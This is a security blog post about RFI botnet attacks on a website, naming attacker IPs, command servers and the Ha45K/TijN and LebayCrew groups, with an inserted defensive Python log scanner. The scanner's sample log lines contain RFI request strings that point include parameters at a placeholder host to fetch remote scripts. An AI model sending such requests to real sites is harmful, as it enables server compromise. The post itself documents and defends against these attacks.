Ha45K / TijN botnets : RFI Attacks

I have noticed an increase in "generic attacks" against my website over the last few days: http://www.malekal.com/modsec/ (blue line on the first graph).

A check shows that RFI attacks in particular are increasing.

A few days ago:
http://www.malekal.com/modsec/index.php?ip=1.224.163.80
http://www.malekal.com/modsec/index.php?ip=71.6.150.241

Latest attacks:
http://www.malekal.com/modsec/index.php?ip=46.252.18.54
http://www.malekal.com/modsec/index.php?ip=95.168.199.227

All the attacks against my websites (42 distinct IPs, so not that many):

The RFI attacks were trying to make the server download a Perl script that connects to scary.angels-agency.nl:

Ha45K_scarys_angels-agency

It then connects to 58.150.55.36 (also reachable through the DNS name ha45k.hopto.org):

Ha45K_rfi_attacks3

I sent an abuse report for this.

Ha45K_scarys_angels-agency_abuse

As a result:

No-IP has acted: ha45k.hopto.org has address 0.0.0.0

and scary.angels-agency.nl is also suspended.
58.150.55.36 is still up.

Actually, the RFI attacks send a script that gathers information from the victim server (and checks whether the RFI attack was successful):

Ha45K_rfi_sh

The bt.php script is still around, and now connects to 58.150.55.36, already mentioned in the abuse email I sent.

Ha45K_rfi_bt

Some shells around:

Ha45K_rfi_attacks2

and the RFI attacks sent by the botmaster:

Ha45K_rfi_attacks
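As an added example (not code from the original post), a small Python scanner for spotting RFI attempts of this kind in Apache access logs: it flags any query-string parameter whose URL-decoded value is an absolute http/https/ftp URL, and groups the hits by source IP and remote payload host so they can feed a ModSecurity block list or an abuse report. The log lines are constructed (two attacking IPs are ones the post lists), and payload-host.example is a placeholder for the attacker's hosting.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-log lines (not taken from the original post); the
# attacking IPs are two the post lists, payload-host.example is a placeholder.
SAMPLE_LOG = """\
46.252.18.54 - - [20/Feb/2014:10:01:02 +0100] "GET /index.php?page=http://payload-host.example/bt.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.8"
95.168.199.227 - - [20/Feb/2014:10:01:05 +0100] "GET /wp-content/plugins/x.php?inc=ftp://payload-host.example/sh.txt?? HTTP/1.1" 404 0 "-" "Mozilla/5.0"
95.168.199.227 - - [20/Feb/2014:10:01:06 +0100] "GET /index.php?page=http%3A%2F%2Fpayload-host.example%2Fsh.txt%3F HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.9 - - [20/Feb/2014:10:02:10 +0100] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [20/Feb/2014:10:02:12 +0100] "GET /modsec/index.php?ip=1.224.163.80 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, identity, user, [timestamp], "request line", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_SCHEMES = {"http", "https", "ftp"}

def rfi_candidates(target):
    """Return (parameter, url) pairs whose URL-decoded value is an absolute remote URL.
    An include parameter pointing at another host is the signature of an RFI attempt;
    parse_qsl decodes percent-encoding, so obfuscated URLs are caught as well."""
    found = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        parts = urlsplit(value)
        if parts.scheme.lower() in REMOTE_SCHEMES and parts.netloc:
            found.append((name, value))
    return found

def scan_log(text):
    """Group RFI attempts by source IP as (parameter, remote host) pairs. Hits are
    candidates for review (a legitimate parameter may carry a URL), and a 200 status
    only means the page was served, not that the remote include actually ran."""
    hits = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        for param, url in rfi_candidates(m.group("target")):
            hits[m.group("ip")].append((param, urlsplit(url).hostname))
    return dict(hits)

def report(hits):
    """One line per attacking IP, ready for a block list or an abuse report."""
    return [f"{ip}: {len(a)} RFI attempt(s) pulling from "
            f"{', '.join(sorted({h for _, h in a}))}" for ip, a in sorted(hits.items())]

if __name__ == "__main__":
    print("\n".join(report(scan_log(SAMPLE_LOG))))
```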


The guy Ha45K seems to be active on the HF forum and the unknown.eu forum.
He also uses the nickname TijN (used in the identd): download.adamas.ai/dlbase/ezines/TeaMp0isoN/ezine1.txt
He has been doing this for a while now (April 2013): https://defense.ballastsecurity.net/decoding/?raw=36173d0a9b460a8089d55086d39aa77d

Ha45K_TijN


EDIT – February 24

It seems Ha45K has read this entry and is trying to spam something:

Ha45K_spam

and some spam attacks:

Ha45K_spam3

We can see the generic attacks peak: http://www.malekal.com/modsec/index.php

Ha45K_spam2

They moved to 188.165.17.104 (OVH) and 62.109.4.70 (THEFIRST-NET, RU).
OVH has done its job and 188.165.17.104 is clean now.

By the way, another active RFI group: LebayCrew
http://www.malekal.com/modsec/index.php?ip=212.227.119.175
http://www.malekal.com/modsec/index.php?ip=203.58.0.155

IRCd: 212.19.3.130 (REDCOM-SRV-WEBHOST, RU)

lebay_crew_RFI

Some scans:

lebay_crew_RFI_scan


Securing your website

You can also take a look at the page: [network] Securing an Apache/PHP/MySQL (LAMP) server, and the index leading to various resources for securing your website.
